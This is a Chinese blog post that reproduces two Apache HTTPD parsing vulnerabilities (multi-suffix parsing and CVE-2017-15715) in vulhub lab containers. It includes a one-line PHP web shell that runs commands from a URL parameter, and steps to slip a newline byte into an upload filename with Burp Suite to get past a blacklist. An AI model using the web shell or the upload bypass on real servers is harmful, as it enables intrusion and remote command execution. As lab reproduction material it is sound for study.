🏘️个人主页: 点燃银河尽头的篝火(●’◡’●)
如果文章有帮到你的话记得点赞👍+收藏💗支持一下哦
【Apache】Apache HTTPD漏洞复现
Apache HTTPD 多后缀解析漏洞(apache_parsing_vulnerability)
漏洞环境
该环境使用vulhub搭建,该漏洞路径为 vulhub/httpd/apache_parsing_vulnerability。进入该漏洞路径后执行以下命令:
docker-compose up -d
漏洞复现
打开目标地址 http://192.168.119.131:80/,将一句话木马保存为 a.php.jpg,并上传到服务器。
<?php system($_GET['a']);?>
访问一句话木马,并通过参数a传递命令。
命令执行成功
Apache HTTPD 换行解析漏洞(CVE-2017-15715)
Apache在2.4.0-2.4.29版本中存在一个解析漏洞。程序在解析PHP时,如果文件名最后有一个换行符x0A,apache依然会将其当成php解析,但是在上传文件时可以成功的绕过黑名单。
如果上传文件的php程序是设置的白名单,那么这个漏洞将无法利用。
漏洞环境
该环境使用vulhub搭建,该漏洞路径为 vulhub/httpd/CVE-2017-15715。进入该漏洞路径后执行以下命令:
docker-compose up -d
查看上传文件的php文件:
cat index.php
该程序是采用黑名单的形式,如果文件后缀名不在名单内即可上传,所以
1.php\x0A
不在黑名单列表中,可以上传。但是x0A
是换行符,所以apache会直接忽略,将其当成php来执行。
漏洞复现
打开目标地址 http://192.168.119.131:8080/,选择一句话木马准备上传。
<?php phpinfo(); ?>
上传文件,使用Burp Suite抓包
点击 Hex
按钮,进入十六进制编辑页面,并找到文件名1.php
的位置
在文件名后插入0a
(换行符),即上图70
、0d
之间
点击 Forward
按钮,这时候浏览器上什么也没有显示,但是此时文件已经上传成功了。
访问一句话木马a.php%0a
http://38.6.177.6:8080/1.php%0a
命令执行成功